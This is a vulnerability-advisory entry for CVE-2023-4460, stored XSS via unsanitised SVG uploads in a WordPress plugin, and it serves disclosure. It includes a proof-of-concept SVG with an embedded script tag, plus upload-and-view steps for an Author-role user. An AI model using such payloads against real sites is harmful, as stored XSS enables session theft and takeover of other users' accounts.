Lucene search
Danilo AlbuquerqueWPEX-ID:82F8D425-449A-471F-94DF-8439924FD628HistoryNov 13, 2023 - 12:00 a.m.
Uploading SVG, WEBP and ICO files <= 1.2.1 - Author+ Stored XSS via SVG
2023-11-1300:00:00
Danilo Albuquerque
55
author
svg
webp
ico
stored xss
javascript
file upload
security vulnerability
Description The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.
As an author, upload an SVG file with malicious JavaScript:
```
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#089900" stroke= "#004400"/>
<script type="text/javascript">alert("pwned by daniloalbugrque");</script>
</svg>
```
Access the file through its URL to see XSS.Related
wpvulndb
wpvulndb
Uploading SVG, WEBP and ICO files <= 1.2.1 - Author+ Stored XSS via SVG
2023-11-13 00:00:00
nvd
nvd
CVE-2023-4460
2023-12-04 22:15:07
vulnrichment
vulnrichment
prion
prion
Design/Logic Flaw
2023-12-04 22:15:00
cvelist
cvelist
cve
cve
CVE-2023-4460
2023-12-04 22:15:07
AI Score
6.4
Confidence
High
EPSS
0
Percentile
14.0%
Related for WPEX-ID:82F8D425-449A-471F-94DF-8439924FD628